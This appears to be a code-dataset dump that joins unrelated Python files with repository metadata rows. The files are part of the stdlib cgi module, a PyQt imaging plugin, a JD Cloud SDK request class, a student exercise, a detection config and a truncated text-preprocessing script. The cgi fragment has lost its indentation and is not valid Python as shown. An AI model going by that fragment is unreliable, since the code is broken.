encoding, errors: request encoding and error handler, passed to
FieldStorage
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. For non-file fields, the value
is a list of strings.
"""
    # RFC 2046, Section 5.1 : The "multipart" boundary delimiters are always
# represented as 7bit US-ASCII.
boundary = pdict['boundary'].decode('ascii')
ctype = "multipart/form-data; boundary={}".format(boundary)
headers = Message()
headers.set_type(ctype)
headers['Content-Length'] = pdict['CONTENT-LENGTH']
fs = FieldStorage(fp, headers=headers, encoding=encoding, errors=errors,
environ={'REQUEST_METHOD': 'POST'})
return {k: fs.getlist(k) for k in fs}
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
bytes* ; None if the data is stored a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace',
max_num_fields=None):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
max_num_fields: int. If set, then __init__ throws a ValueError
if there are more than n fields read by parse_qsl().
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
self.max_num_fields = max_num_fields
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
else:
if not (isinstance(headers, (Mapping, Message))):
raise TypeError("headers must be mapping or an instance of "
"email.message.Message")
self.headers = headers
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
if not (hasattr(fp, 'read') and hasattr(fp, 'readline')):
raise TypeError("fp must be file pointer")
self.fp = fp
self.encoding = encoding
self.errors = errors
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding,
self.errors)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen >= 0:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __del__(self):
try:
self.file.close()
except AttributeError:
pass
def __enter__(self):
return self
def __exit__(self, *args):
self.file.close()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __bool__(self):
if self.list is None:
raise TypeError("Cannot be converted to bool.")
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list = [MiniFieldStorage(key, value) for key, value in query]
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list.extend(MiniFieldStorage(key, value) for key, value in query)
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# Ensure that we consume the file until we've hit our inner boundary
while (first_line.strip() != (b"--" + self.innerboundary) and
first_line):
first_line = self.fp.readline()
self.bytes_read += len(first_line)
# Propagate max_num_fields into the sub class appropriately
max_num_fields = self.max_num_fields
if max_num_fields is not None:
max_num_fields -= len(self.list)
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
# Some clients add Content-Length for part headers, ignore them
if 'content-length' in headers:
del headers['content-length']
limit = None if self.limit is None \
else self.limit - self.bytes_read
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing, limit,
self.encoding, self.errors, max_num_fields)
if max_num_fields is not None:
max_num_fields -= 1
if part.list:
max_num_fields -= len(part.list)
if max_num_fields < 0:
raise ValueError('Max number of fields exceeded')
self.bytes_read += part.bytes_read
self.list.append(part)
if part.done or self.bytes_read >= self.length > 0:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if self.limit is not None and _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if delim == b"\r":
line = delim + line
delim = b""
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
elif line.endswith(b"\r"):
# We may interrupt \r\n sequences if they span the 2**16
# byte boundary
delim = b"\r"
line = line[:-1]
last_line_lfend = False
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except OSError as msg:
print("OSError:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def valid_boundary(s):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| [
"[email protected]"
] | |
a7806cbd020f9a30ef0b3337e9f90d839d99a427 | da92caf06447ec7e244dfa11e71b551a4dab7d14 | /src/plugins/evoked_average.py | 21e26af5a91a55b09c07c45812ed17bb1e6ac9ab | [
"MIT"
] | permissive | Frikster/Mesoscale-Brain-Explorer | 28298adbcb49dc399f85fe4db1c3dc1263468677 | 269d8f18162e2b9dca4619561e73a6beb8ba810c | refs/heads/master | 2020-04-04T22:17:29.714298 | 2017-11-20T16:24:19 | 2017-11-20T16:24:19 | 61,849,037 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 4,036 | py | #!/usr/bin/env python3
import os
import numpy as np
import psutil
import qtutil
from PyQt4.QtGui import *
from .util import project_functions as pfs
from .util.plugin import PluginDefault
from .util.plugin import WidgetDefault
class Widget(QWidget, WidgetDefault):
class Labels(WidgetDefault.Labels):
pass
class Defaults(WidgetDefault.Defaults):
manip = 'evoked-avg'
def __init__(self, project, plugin_position, parent=None):
super(Widget, self).__init__(parent)
if not project or not isinstance(plugin_position, int):
return
self.avg_button = QPushButton('Generate Evoked Average')
WidgetDefault.__init__(self, project, plugin_position)
def setup_ui(self):
super().setup_ui()
self.vbox.addWidget(self.avg_button)
def setup_signals(self):
super().setup_signals()
self.avg_button.clicked.connect(self.execute_primary_function)
def execute_primary_function(self, input_paths=None):
if not input_paths:
if not self.selected_videos:
return
else:
selected_videos = self.selected_videos
else:
selected_videos = input_paths
progress_global = QProgressDialog('Creating evoked average...', 'Abort', 0, 100, self)
progress_global.setAutoClose(True)
progress_global.setMinimumDuration(0)
def global_callback(x):
progress_global.setValue(x * 100)
QApplication.processEvents()
filenames = selected_videos
if len(filenames) < 2:
qtutil.warning('Select multiple files to average.')
return
stacks = [np.load(f, mmap_mode='r') for f in filenames]
lens = [len(stacks[x]) for x in range(len(stacks))]
min_lens = np.min(lens)
breadth = stacks[0].shape[1]
length = stacks[0].shape[2]
trig_avg = np.empty((min_lens, length, breadth), np.load(filenames[0], mmap_mode='r').dtype)
for frame_index in range(min_lens):
global_callback(frame_index / min_lens)
frames_to_avg = [stacks[stack_index][frame_index]
for stack_index in range(len(stacks))]
frames_to_avg = np.array(frames_to_avg, dtype=np.float32)
avg = np.mean(frames_to_avg, axis=0, dtype=np.float32)
trig_avg[frame_index] = avg
global_callback(1)
manip = self.Defaults.manip + '_' + str(len(filenames))
output_path = pfs.save_project(filenames[0], self.project, trig_avg, manip, 'video')
pfs.refresh_list(self.project, self.video_list,
self.params[self.Labels.video_list_indices_label],
self.Defaults.list_display_type,
self.params[self.Labels.last_manips_to_display_label])
return output_path
# self.update_tables()
def setup_whats_this(self):
super().setup_whats_this()
self.avg_button.setWhatsThis("Generate evoked average for selected image stacks where each frame is averaged "
"across image stacks for each frame")
class MyPlugin(PluginDefault):
def __init__(self, project, plugin_position):
self.name = 'Evoked Average'
self.widget = Widget(project, plugin_position)
super().__init__(self.widget, self.widget.Labels, self.name)
def check_ready_for_automation(self, expected_input_number):
self.summed_filesize = 0
for path in self.widget.selected_videos:
self.summed_filesize = self.summed_filesize + os.path.getsize(path)
self.available = list(psutil.virtual_memory())[1]
if self.summed_filesize > self.available:
return False
return True
def automation_error_message(self):
return "Not enough memory. All files to be averaged together are of size ~"+str(self.summed_filesize) +\
" and available memory is: " + str(self.available)
| [
"[email protected]"
] | |
9fa71db652f5ba9a7efaf6487c314e53826c6153 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/tidb/apis/DescribeAvailableDBInfoInternelRequest.py | e771d081b365e9d329da6981125f9fced96c4cf4 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 1,479 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeAvailableDBInfoInternelRequest(JDCloudRequest):
"""
    Query the basic information supported by TiDB.
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeAvailableDBInfoInternelRequest, self).__init__(
'/regions/{regionId}/instances:describeAvailableDBInfoInternel', 'GET', header, version)
self.parameters = parameters
class DescribeAvailableDBInfoInternelParameters(object):
def __init__(self,regionId, ):
"""
        :param regionId: Region code
"""
self.regionId = regionId
self.azs = None
def setAzs(self, azs):
"""
        :param azs: (Optional) Availability zones for the user [separate multiple values with commas]
"""
self.azs = azs
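# Illustrative usage sketch (the service client that actually executes the
# request is defined elsewhere in the SDK and its class name is an assumption):
#   parameters = DescribeAvailableDBInfoInternelParameters(regionId='cn-north-1')
#   parameters.setAzs('cn-north-1a,cn-north-1b')
#   request = DescribeAvailableDBInfoInternelRequest(parameters)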
| [
"[email protected]"
] | |
47d31b4ad6d9d3f9ec16487c975797465de7096d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/22/usersdata/112/11794/submittedfiles/av1_2.py | 5ecfae8a8c59536c3785bab3a905bd43d390601a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
ant=0
prox=0
meio=0
n=input('Digite o valor de n:')
j=input('Digite o valor de j:')
k=input('Digite o valor de k:')
l=input('Digite o valor de l:')
if n==k and j!=l:
print('verdadeira')
elif j==l and n!=k:
print('verdadeira')
else:
    print('falsa') | [
"[email protected]"
] | |
9c125735232060d0d2ab96a7273d2ed807cb7f56 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/mask2former/mask2former_swin-b-p4-w12-384-in21k_lsj_8x2_50e_coco-panoptic.py | 0141271ed055de4c1cb757b1cf83099916ad3b24 | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 941 | py |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
_base_ = ['./mask2former_swin-b-p4-w12-384_lsj_8x2_50e_coco-panoptic.py']
pretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth' # noqa
model = dict(
backbone=dict(init_cfg=dict(type='Pretrained', checkpoint=pretrained)))
| [
"[email protected]"
] | |
870d12fe6a587e970c108504b42268cb10c844f3 | 2ed2dd917afb05d194e87f989d78953b31a5781b | /lesson10/mission08.py | 718005e6a8b1523d4636183b46dc3a00179e899b | [] | no_license | RenegaDe1288/pythonProject | 4058d549db7c37652f77438c31f8b31476497d98 | 801c06f3be22ed63214987b11d6f1b3fd2fe5b44 | refs/heads/master | 2023-08-17T13:20:50.777842 | 2021-10-05T10:51:00 | 2021-10-05T10:51:00 | 393,145,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | lent = int(input('Введите ширину '))
lent_2 = int(input('Введите длину '))
for row in range(lent):
for col in range(lent_2):
if col == lent_2 // 2 and row != lent//2:
print('|', end='')
elif row == lent // 2:
print('-', end='')
elif col == lent_2//2 + 5+ row:
print('\\', end='')
elif col == lent_2//2- row -5:
print('/', end='')
else:
print(' ', end='')
print()
| [
"[email protected]"
] | |
473d655633f7f72afa53daced7e8c8a4a90c4f51 | a209c2238ff97d781fc6f15d9b3ae6ecf9c15b53 | /utils/preprocess.py | 6b7077e20c2ba3b9257a3940756e4f54e10dd416 | [] | no_license | Arcana-2236/Text-Classification | 1788e05e4c29ce0e7130f38cd16af5ab08fbe6fd | 69047f0ffdfc621e3cb2d59056ac93d69582090b | refs/heads/master | 2022-04-12T08:30:50.089277 | 2020-03-28T06:09:16 | 2020-03-28T06:09:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,234 | py | import os
import re
import zipfile
import pickle
import jieba
import pandas as pd
import numpy as np
from collections import Counter
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.model_selection import train_test_split
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# input file
ZIP_DATA = os.path.join(ROOT, 'data', '百度题库.zip')  # archive to extract
STOPWORDS = os.path.join(ROOT, 'data', 'stopwords.txt')
# output file path
# BERT
TRAIN_TSV = os.path.join(ROOT, 'data', 'train.tsv')  # data file for BERT
DEV_TSV = os.path.join(ROOT, 'data', 'dev.tsv')
TEST_TSV = os.path.join(ROOT, 'data', 'test.tsv')
# TextCNN and Transformer
TOKENIZER_BINARIZER = os.path.join(ROOT, 'data', 'tokenizer_binarizer.pickle')
LABELS_FILE = os.path.join(ROOT, 'data', 'label.txt')
X_NPY = os.path.join(ROOT, 'data', 'x.npy')  # data files for TextCNN and Transformer
Y_NPY = os.path.join(ROOT, 'data', 'y.npy')
def unzip_data():
"""
    Unzip the data archive
"""
with zipfile.ZipFile(ZIP_DATA, 'r') as z:
z.extractall(os.path.join(ROOT, 'data'))
print("已将压缩包解压至{}".format(z.filename.rstrip('.zip')))
return z.filename.rstrip('.zip')
def combine_data(data_path):
"""
    Merge all files from the four subject folders
"""
r = re.compile(r'\[知识点:\]\n(.*)') # 用来寻找知识点的正则表达式
r1 = re.compile(r'纠错复制收藏到空间加入选题篮查看答案解析|\n|知识点:|\s|\[题目\]') # 简单清洗
data = []
for root, dirs, files in os.walk(data_path):
        if files:  # if the folder contains csv files
for f in files:
subject = re.findall('高中_(.{2})', root)[0]
topic = f.strip('.csv')
tmp = pd.read_csv(os.path.join(root, f)) # 打开csv文件
tmp['subject'] = subject # 主标签:科目
tmp['topic'] = topic # 副标签:科目下主题
tmp['knowledge'] = tmp['item'].apply(
lambda x: r.findall(x)[0].replace(',', ' ') if r.findall(x) else '')
tmp['item'] = tmp['item'].apply(lambda x: r1.sub('', r.sub('', x)))
data.append(tmp)
data = pd.concat(data).rename(columns={'item': 'content'}).reset_index(drop=True)
    # drop the two leftover web-scraper columns
data.drop(['web-scraper-order', 'web-scraper-start-url'], axis=1, inplace=True)
return data
def extract_label(df, freq=0.01):
"""
    :param df: the merged dataset
    :param freq: labels appearing in less than this fraction of samples are dropped
:return: DataFrame
"""
    knowledges = ' '.join(df['knowledge']).split()  # flatten all knowledge points
knowledges = Counter(knowledges)
    k = int(df.shape[0] * freq)  # occurrence count corresponding to freq
    print('Filtering out labels that appear fewer than %d times' % k)
    top_k = {i for i in knowledges if knowledges[i] > k}  # keep only knowledge points seen more than k times
